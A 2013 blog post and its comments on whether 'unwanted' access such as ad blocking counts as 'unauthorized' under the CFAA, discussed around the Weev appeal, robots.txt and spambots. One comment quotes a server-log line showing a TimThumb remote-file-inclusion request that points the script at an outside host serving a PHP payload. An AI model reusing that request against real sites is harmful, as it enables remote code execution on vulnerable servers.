Tuesday, July 02, 2013

I'm hacking your website

A dream team of computer+law geeks have put together an appelant brief in Weev's defense. A major feature is that simply "unwanted" access doesn't mean "unauthorized" under the law: just because you don't like what I do doesn't necessarily make me a criminal.

For example, I use "AdBlock" to block advertisements from websites. Since websites earn money from advertisements, my free-riding with AdBlock is unwanted access. But is this conduct prohibited under the CFAA? I don't think so, but then, I wouldn't have thought Weev's (adding one to a URL) or Lori Drew's (violating ToS) conduct illegal either.

In the following two screenshots I demonstrate what AdBlock does. The first shows my access without ads on the site "Volokh.com". Notice the 'stop sign" icon near the URL which indicates how many items on the page have been blocked. Also notice my smiling face in the "comments" section -- I included that in the screen capture so that you know it's me, so that if "Volokh.com" chooses to prosecute me for this, the evidence of my guilt is clear. The second screenshot shows what the site looks like with AdBlock disabled.
This is the central question behind the Weev case. Is this conduct prohibited by the CFAA? Certainly, I'm a jerk, but the question is whether I should be a felon.


lucia said...

I would be very surprised of Volokh went after you for using ad blocking.

It's also not entirely clear that accessing while blocking ads is 'unwanted' access. I have a few ads on my blog and I wouldn't characterize ad-free visits as unwanted.

On the other hand, these in today's logs were unwanted (big time):

"GET /?-s HTTP/1.1" 503
"GET /wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=http://flickr.com.sohbetblog.tk/xp.php HTTP/1.1"

(BTW: I do not have the plugin "category-grid-view-gallery" installed and never have.)

I wouldn't mind if both those were illegal. I wouldn't mind if visits from spambots were illegal. But enforcing that would likely be a practical impossibility.

There were a number of other visits that were unwanted and likely shouldn't be illegal. I've managed to block an awful lot of unwanted visits from seo/ reputation / twitterbots and such. I sometimes wish those could be made illegal but in some way where it would be possible for them to know that they were unwanted.

(Hmmm hope this isn't a duplicate.)

shg said...

But is it a false dichotomy to categorize the web into public or private, access to the former never constituting a criminal act and the latter always? Are there any middle ground pages, something that exists, can be accessed (at least to some extent) without a password, but isn't linked or indexed and is reasonably expected to remain private?

Jonathan Quimbly said...

Spiders that disregard robots.txt have always been a nuisance. Most are courteous enough to provide explanation at a URL embedded in the user-agent string (usuallty college students or startups but not always), but all have crossed my explicit policy line.

Therefore they're accessing my hosts in an unauthorized fashion, as I've explicitly stated my policy via robots.txt

Should I phone the DA or federal prosecutors? Make an example of these miscreants so to highlight overreaching prosecutions like Weev's?